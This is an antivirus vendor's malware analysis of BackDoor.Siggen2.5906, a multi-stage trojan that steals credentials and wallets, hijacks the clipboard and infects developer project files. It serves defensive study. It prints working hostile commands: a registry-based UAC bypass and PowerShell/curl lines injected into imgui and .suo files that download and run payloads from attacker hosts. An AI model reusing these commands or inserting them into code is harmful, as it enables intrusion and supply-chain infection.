マイライブラリ
マイライブラリ

+ マイライブラリに追加

電話

お問い合わせ履歴

電話

03-6550-8770

Profile

BackDoor.Siggen2.5906

Added to the Dr.Web virus database: 2026-06-01

Virus description added:

SHA1:

  • 8030c42dc54975c43f7625d874e7890f025dc9f4

Description

A phase 3 trojan in a multi-phase infection sequence that facilitates data theft, clipboard contents monitoring, backdoor deployment, rogue mining and infecting other files:

The backdoor ensures that it will persist in the system and carries out its main malicious tasks.

Operation

Preparations

The backdoor checks whether it's being run in a sandbox. To accomplish this, it examines the username: it must not contain the string "voke9asd89a8sd8aw8d8awd8a", nor should it be "Srv". It then runs checks similar to those conducted by Trojan.DownLoader49.35687. It uses the CreateDXGIFactory() function to check the video adapter name, which must not contain any of the following:

  • unknown,
  • Microsoft Basic Render,
  • NVIDIA GeForce RTX 3060 Ti.

Then it validates the username, which must not match any of the names listed below:

  • george,
  • Bruno,
  • Abby,
  • AMF,
  • dx,
  • John,
  • elz,
  • Admin.

If just one check fails, the trojan process ends. Then BackDoor.Siggen2.5906 employs the named pipe pipe\\ VccFramework to acquire the trojan ID and the domain name of the C2 server it will communicate with. Next, the backdoor creates a mutex synchronization object named Global\ PFNX_side {the first part of Pipe\VccFramework}.

Interaction with the C2 server

Having decrypted the domain name, the backdoor connects to the domain using the url {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=rtttry and downloads an encryption key for subsequently encrypting its communications with the server. If obtaining the key with this method proves impossible, the trojan uses dns.google.com/resolve to translate the domain name into the C2 IP address and converts it for use as an encryption key.

The trojan utilises XOR to encrypt the data it transmits to the server. Various strings and user IDs also get added to the data.

The trojan then connects to the domain using {C2 domain}/api/mnr/bobby31[.]php?type=fudrocketmod&security={the first part of pipe\VccFramework}. It obtains configuration data containing information about what its further actions should be: infect Win SDK or an Exodus crypto wallet, or modify registry entries related to WinRAR.

Persistence

The backdoor downloads the file "bungee.boo” from {C2 domain}/Stb/PokerFace/init[.]php?id=Mother and saves it to C:\ProgramData\bungee.boo. This file duplicates the phase 2 payload (Trojan.DownLoader49.35687). Then it replaces the following DLL files with it:

  • Discord's profapi.dll
  • “domain_actions.dll" in the "Domain Actions" folder and "well_known_domains.dll" in the "Well Known Domains" folder used by Microsoft Edge as well as the files manifest.json and manifest.fingerprint in these folders,
  • C:\Windows\omadmapi.dll.

BackDoor.Siggen2.5906 can also modify the Windows registry so that opening a compressed file with WinRar.exe will trigger the execution of malicious code.

To carry out actions requiring administrator privileges, the backdoor employs a UAC bypass technique. The malware generates a .vbs script with a random digit-based name. The script contains an instruction that cannot be executed without administrator permissions. It then uses cmd.exe to run the following commands:


reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
/c start /B ComputerDefaults.exe 

Collecting Information

The backdoor collects the following system information:

  • username,
  • CPU,
  • GPU,
  • ram,
  • Location

The information is relayed to {C2 domain}/api/mnr/bobby31 [.]php?security=Daytone&type=process along with the string “BrattSallatSecretPlace62|”.

Next, the trojan carries out its five malicious tasks: steal data, access clipboard content, engage in rogue mining, and infect other files.

Data theft

The trojan steals various information from the infected device, including: Discord tokens, Telegram files, passwords and cookies stored by browsers and Exodus crypto wallet data.

  1. Discord tokens.

    The trojan searches for Discord tokens in discord, discordptb, Lightcord, Opera, Opera GX, Brave Browser, Chrome SxS, Chrome, Chromium, Edge, and Yandex Browser. They are used to access user accounts without entering their respective logins and passwords. Encrypted Discord token strings start with the prefix dQw4w9WgXcQ: The trojan looks for tokens in .ldb and .log files found in the LevelDB directory, decrypts them and obtains the following information: the ID, email, phone number, the account verification status, and the availability of a premium subscription. The string “MndayFrOppsLX|” is then added to the stolen tokens, and they get sent to {C2 domain}/api/mnr/bobby31 [.]php?type=tknlogprcs&security=Daytone.

  2. Telegram files.

    The backdoor searches for the application folder Telegram Desktop\tdata on the device, archives the files, and sends them to {C2 domain}/api/mnr/bobby31 [.]php?type=APLATG&security=Daytone.

  3. Passwords and cookie files.

    The trojan sends a request to {C2 domain}/index[.]php?type=pexists&security=2. The response contains configuration information indicating whether the backdoor needs to copy passwords and/or cookie files. It decrypts passwords stored by Edge, Chrome, and Brave, adds the string “BabbChnnn64xaxz |” to them, and relays the data to {C2 domain}/api/mnr/bobby31[.]php?type=pssprc&security=Daytone. Cookie files from the web browsers Edge, Chrome, Brave, Mozilla and Opera also get decrypted and sent to the server.

    Additionally, the trojan can start browsers with the parameters --headless --disable-gpu --no-sandbox --disable-dev-shm-usage--user-data-dir={path} --remote-debugging-port=0' in a hidden window.

    It also downloads the file CCCWF.tmp (Trojan.PWS.Siggen5.33623) from {C2 domain}/Stb/PokerFace/init[.]php?id=Ppkvum into %TEMP%. This malicious code is injected into browser processes to decrypt passwords and save them to the brx file. The encryption keys, in turn, are saved to the crx file. Trojan execution logs are written to the file dll_debug.txt.

    #drweb

    The trojan adds the string WalterXPrxxxzCokerPro37&|-|& to the decrypted passwords in the brx file and sends it, along with the stolen cookie files, to {C2 domain}/api/mnr/bobby31[.]php?type=ckiprc&security=Daytone.

  4. Exodus data

    The trojan looks for the Exodus crypto wallet folder on the infected device. If successful, it archives it and forwards the archive to {C2 domain}/api/mnr/bobby31[.]php?type=APLADEX&security=Daytone/.

    In addition to stealing Exodus’s folders, the trojan modifies the crypto wallet. To accomplish this, it locates the app.asar file and replaces it with a file downloaded with curl from the URL found in balista [.]lol/Stb/PokerFace/RTApp [.]txt. In the replaced version, index.js (Trojan.Siggen32.44702) contains the unlock() function, which, when launched, intercepts the wallet recovery phrases and relays them to the attackers’ server.

    #drweb

Accessing clipboard contents
  1. Bank Cards

    The backdoor uses regular expressions to constantly monitor clipboard contents. If bank card information appears in the clipboard, the backdoor will add the string “AtummmSalllllxXX1522|” to the data and send it to {C2 domain}/api/mnr/bobby31[.]php?type=cclogentry&security=Daytone.

  2. Cryptocurrency

    The trojan sends a query containing the string “VooZXOOPPPS883321|” to {C2 domain}/api/mnr/bobby31[.]php?type=cryptosecr&security=Daytone The response will contain the addresses of attackers' crypto wallets. The trojan will use them to spoof the addresses it discovers in the clipboard.

Backdoor

The trojan downloads a new decryption key from {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=rtttry. Then it sends a request to {C2 domain}/api/mnr/bobby31[.]php?type=pingcnfr&security=Daytone and receives a list of actions to perform. The available commands for remote control over the device:

exc Use curl to download a specific file and run it
RVRS Start Reverse Proxy
RUNCMD Run a command via cmd
GETFILE Upload the contents of a specific file to the C2 server
LISTDIR Send a list of files in the system's specific directory to the C2 server
TROLL Troll the user. The available trolling options include: earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer and more.
Rogue mining

The trojan uses curl to download and run the file https://files[.]catbox [.]moe/lvh9j3 [.]bin. This file is a loader that runs the rogue mining app Trojan.BtcMine.3956.

Infecting files

The trojan sends a query to {C2 domain}/api/mnr/bobby31[.]php?type=stbcfg&security=Daytone&owr={the first part of pipe\VccFramework} and receives configuration information indicating which files to infect. Available options:

  • imgui_impl_win32.cpp,
  • .suo,
  • .exe,
  • winnetwk.h (Windows SDK),
  • .vcxproj and .csproj.

To determine the paths to target files, the trojan examines the available disk drives and runs a command. For example, for drive A://


dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290
  1. imgui_impl_win32.cpp. Trojan.Loader.3129

    The trojan targets Dear ImGui, a popular GUI library for C++. The trojan adds two lines into a file: the first contains the payload, while the second launches it.

    #drweb

    #drweb

    The resulting command is as follows:

    
    start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 
    

    Now all of the applications that get built using the infected file imgui_impl_win32.cpp will contain malicious code and spread the infection to other computers.

  2. .suo. Trojan.Loader.3138

    This filename extension is associated with Microsoft Visual Studio. These files store user settings for specific projects. The trojan replaces an original file with its infected version, downloaded from the C2 server.

    #drweb

    Opening the corresponding project in Visual Studio will also run this malicious code:

    
    javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\"
    \"https://pee-files.nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\"
    \"C:\\ProgramData\\S47LY.exe\"', 0, false);close(); 
    
  3. winnetwk.h. Trojan.Loader.3184

    Windows SDK is Microsoft’s official toolkit for creating applications for Windows.

    The trojan searches the registry section SOFTWARE\Microsoft\Windows Kits\Installed Roots for the value KitsRoot10. Once it has located Windows SDK’s installation folder, the trojan searches it for the file winnetwk.h, which is responsible for implementing networking features. The trojan adds malicious code into the file.

    #drweb

    This ensures that all subsequently created apps relying on winnetwk.h will incorporate malicious code.

  4. .exe

    The trojan searches for suitable .exe files and injects its API and initterm initialisation functions into them. Then the file starts performing the functions of the phase 1 malware, a.k.a. Trojan.DownLoader49.35384.

  5. .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) and .csproj (Trojan.Loader.3126)

    These are Visual Studio’s C++ and C# project files. The malware adds a pre-build event into the IDE to ensure that a malicious command is run automatically before any project build is created. Earlier versions introduced this code:

    #drweb

    Now the code has become more complex and includes additional obfuscation features:

    #drweb

    #drweb

    Executing the malicious command creates a .vbs script that, in turn, runs a PowerShell payload. The trojan sends queries using these URLs:

    • youtu[.]be/akoxddx6lgc,
    • steamcommunity[.]com/profiles/76561198737324192.

    They point to a YouTube account page containing yet another base64-encoded URL. Decoding the URL provides the trojan with a C2 server address that it will use to download a payload similar to that of Trojan.DownLoader49.35687.

MITRE ATT@CK MATRIX

Tactic Technique
Executor

Command and scripting interpreter (T1059)

User execution (T1204)

Persistence

Boot or Logon Autostart Execution (T1547)

Compromise Host Software Binary (T1554)

Privilege Escalation

Process Injection (T1055)

Bypass User Account Control (T1548.002)

Stealth

Obfuscated files or information (T1027)

Masquerading (T1036)

Virtualization/sandbox evasion (T1497)

Bypass User Account Control (T1548.002)

Process Injection (T1055)

Credential Access

Steal Web Session Cookie (T1539)

Credentials from Web Browsers (T1555.003)

Discovery

Query Registry (T1012)

System owner/user discovery (T1033)

System information discovery (T1082)

File and Directory Discovery (T1083)

Virtualisation/sandbox evasion (T1497)

Software Discovery (T1518)

System Location Discovery (T1614)

Collection

Data Staged (T1074)

Clipboard Data (T1115)

Archive Collected Data (T1560)

Command and Control

Application layer protocol (T1071)

Web Service (T1102)

Ingress Tool Transfer (T1105)

Encrypted Channel (T1573)

Exfiltration Exfiltration over C2 Channel (T1041)

More about Trojan.DownLoader49.35384

More about Trojan.DownLoader49.35687

More about Trojan.BtcMine.3956

Indicators of Compromise

Trojan review

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android